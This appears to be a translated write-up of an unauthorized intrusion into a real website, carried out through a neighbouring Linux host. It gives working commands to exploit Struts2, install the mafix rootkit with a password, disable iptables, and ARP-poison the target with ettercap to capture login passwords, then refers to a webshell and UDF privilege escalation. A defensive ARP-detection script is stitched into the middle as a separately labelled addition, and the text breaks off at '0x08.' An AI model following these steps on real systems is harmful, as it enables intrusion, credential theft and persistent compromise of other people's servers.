Sniffing passwords from a Linux server

Source: Internet
Author: User


Target: www.xxx.com

 

0x01 Main site reconnaissance


The main site runs dedecms. None of the released 0-days work against it, and the admin backend is not at the default location. Google hacking turned up nothing.

 

0x02 Co-hosted site analysis

 

There are more than 20 co-hosted sites, most of them secondary developments of the site's CMS, with no vulnerabilities. There is also a dz BBS, which has no vulnerability either.

 

0x03 Breaking into a Linux host on the C segment

 

Browsing the websites on the C segment turns up ssss.com/login.action. This is the familiar Struts2 code execution, which needs no explanation.


0x04 Linux host rootkit

The rootkit I use here is mafix.

 

Run the following commands:


tar zxvf mafix.tar.gz

chmod +x root

./root password 23141

 

Log in with PuTTY.

Note: if the firewall is on and you do not want to add rules to it, you can disable it.

 

Stop the firewall:

/etc/init.d/iptables stop



0x05 Installing ettercap on the Linux host to sniff passwords

 

1. Download and install the EPEL rpm package.

rpm -ivh http://dl.fedoraproject.org/pub/epel/5/i386/epel-release-5-4.noarch.rpm


2. yum -y install ettercap

Start sniffing

Enable forwarding (not required):

echo 1 > /proc/sys/net/ipv4/ip_forward

 

Sniffing

 

ettercap -T -M arp /target-ip/80 /gateway/ -w /tmp/log.txt

 

Sniffing may take a long time, so run it in the background:

nohup ettercap -T -M arp /target-ip/80 /gateway/ -w /tmp/log.txt
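
From the defender's side, the ARP poisoning this ettercap step relies on leaves traces in the ARP caches of the hosts on the segment. The following is an added example, not part of the original write-up: it compares two constructed snapshots in /proc/net/arp format and reports IPs whose MAC changed and MACs that answer for several IPs. The function names and all addresses are assumptions made for illustration.

```python
"""Detect signs of ARP poisoning in /proc/net/arp snapshots (added example)."""

# Constructed sample data: two snapshots of /proc/net/arp taken on one host.
# IPs use the 192.0.2.0/24 documentation range; MAC addresses are made up.
SNAPSHOT_BEFORE = """\
IP address       HW type     Flags       HW address            Mask     Device
192.0.2.1        0x1         0x2         02:00:00:aa:aa:01     *        eth0
192.0.2.50       0x1         0x2         02:00:00:bb:bb:50     *        eth0
192.0.2.77       0x1         0x2         02:00:00:cc:cc:77     *        eth0
"""
SNAPSHOT_AFTER = """\
IP address       HW type     Flags       HW address            Mask     Device
192.0.2.1        0x1         0x2         02:00:00:cc:cc:77     *        eth0
192.0.2.50       0x1         0x2         02:00:00:bb:bb:50     *        eth0
192.0.2.77       0x1         0x2         02:00:00:cc:cc:77     *        eth0
192.0.2.90       0x1         0x0         00:00:00:00:00:00     *        eth0
"""

def parse_arp(text):
    """Return {ip: mac} for resolved entries, skipping the header line."""
    table = {}
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 6:
            continue
        ip, flags, mac = fields[0], int(fields[2], 16), fields[3].lower()
        if flags & 0x2 and mac != "00:00:00:00:00:00":  # 0x2 = ATF_COM (complete)
            table[ip] = mac
    return table

def find_arp_anomalies(before_text, after_text):
    """Report IPs whose MAC changed and MACs that answer for several IPs."""
    before, after = parse_arp(before_text), parse_arp(after_text)
    changed = {ip: (before[ip], mac) for ip, mac in after.items()
               if ip in before and before[ip] != mac}
    owners = {}
    for ip, mac in after.items():
        owners.setdefault(mac, []).append(ip)
    shared = {mac: sorted(ips) for mac, ips in owners.items() if len(ips) > 1}
    return changed, shared

if __name__ == "__main__":
    changed, shared = find_arp_anomalies(SNAPSHOT_BEFORE, SNAPSHOT_AFTER)
    for ip, (old, new) in changed.items():
        print(f"ALERT {ip}: MAC changed {old} -> {new}")
    for mac, ips in shared.items():
        print(f"ALERT {mac} answers for {', '.join(ips)}")
```

A MAC answering for several IPs also occurs legitimately with proxy ARP or hosts that hold several addresses, so a change of the gateway's MAC is the stronger signal.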

 

0x06 Data filtering

 

Because this site carries a lot of traffic, more than 1 GB of data accumulates in an hour, so filter it with grep.

 

Packet analysis shows that the target site's front end submits the password in the field pwd.

 

cat /tmp/log.txt | grep -a "&pwd=" | more

 

Okay, I check it every few hours. After half a day, I had sniffed the backend password and the backend address.

 


0x07 Uploading a one-line webshell and escalating to root

Upload a one-line webshell, look through the files, find the root, and use my udf api to add a user and escalate privileges.

 

0x08.
